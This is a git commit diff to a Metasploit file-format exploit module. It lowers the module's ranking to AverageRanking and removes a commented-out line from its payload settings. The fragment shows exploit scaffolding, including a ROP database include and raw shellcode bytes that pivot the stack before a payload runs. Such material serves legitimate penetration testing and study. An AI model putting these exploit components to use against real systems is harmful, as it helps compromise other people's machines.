Hmm, change ranking

bug/bundler_fix
sinn3r 2013-11-23 00:51:58 -06:00
parent 6ccc3e3c48
commit 9987ec0883
1 changed files with 2 additions and 3 deletions

View File

@ -26,7 +26,7 @@ end
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
Rank = AverageRanking
include Msf::Exploit::FILEFORMAT
include Msf::Exploit::RopDb
@ -66,12 +66,11 @@ class Metasploit3 < Msf::Exploit::Remote
],
'Payload' =>
{
#'PrependEncoder' => "\xbc\x36\x06\x0f\x20", # mov esp, 200f0636h
'PrependEncoder' => "\x64\xa1\x18\x00\x00\x00" + # mov eax, fs:[0x18]
"\x83\xC0\x08" + # add eax, byte 8
"\x8b\x20" + # mov esp, [eax]
"\x81\xC4\x30\xF8\xFF\xFF", # add esp, -2000
'BadChars' => "\x00"
'BadChars' => "\x00"
},
'DefaultOptions' =>
{